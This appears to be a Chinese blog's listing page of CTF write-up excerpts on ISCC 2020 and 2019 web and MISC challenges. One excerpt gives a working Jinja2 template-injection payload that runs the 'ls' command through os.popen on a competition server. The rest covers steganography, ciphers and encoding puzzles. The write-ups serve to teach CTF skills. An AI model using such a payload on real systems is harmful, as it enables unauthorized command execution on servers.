ISCC
Qwzf
一个爱学习的小白
个人博客:http://www.qwzf.top/
展开
-
ISCC2020 擂台题Web总结与复现
擂台Web1:Easy Injection题目难度:简单考察:python模板注入(jinja2模板注入)典型的模板注入,无任何过滤,直接构造利用payload:http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].p原创 2020-06-30 23:28:02 · 676 阅读 · 0 评论 -
ISCC2020练武题Web总结
前言接下来,继续总结练武题的Web题WebMISC原创 2020-06-06 00:43:49 · 2884 阅读 · 0 评论 -
ISCC2020部分MISC总结
前言这次ISCC,不得不说杂项题脑洞真大(脑袋坑太少,就做出了几道),并且没有Crypto题。但Web题目难度还行(不容易的题,主要是涉及脑洞),这里先总结一下做出来的MISC题,另起一篇总结Web题。MISC1:ISCC签到题目难度:简单考察:图片高度+维吉尼亚密码在winhex里改图片高度,得到然后进行维吉尼亚密码解密,并且很容易想到密钥是highMISC2:寻找小明-1题目难度:普通考察:Stegsolve+使用cv2库cv2模块使用参考:CV2模块使用(详细教程)模块cv原创 2020-05-29 23:07:57 · 3544 阅读 · 0 评论 -
ISCC2019-MISC做题总结
ISCC-MISC做题总结本小白又来总结了。。虽然做题做的非常菜,但还是总结一下吧。总结一下做题思想,让自己能够不断提高。。。。MISC1- (1)这道题主要是八进制转ascll码,然后base解码下载附件,并解压,得到一个message.txt文件,打开发现每个数字的每一位最高是7,考虑一下是不是8进制转换10(或16)进制,然后转ascll码。然后为了方便,我写了个代码转换(此...原创 2019-07-16 17:16:40 · 1036 阅读 · 3 评论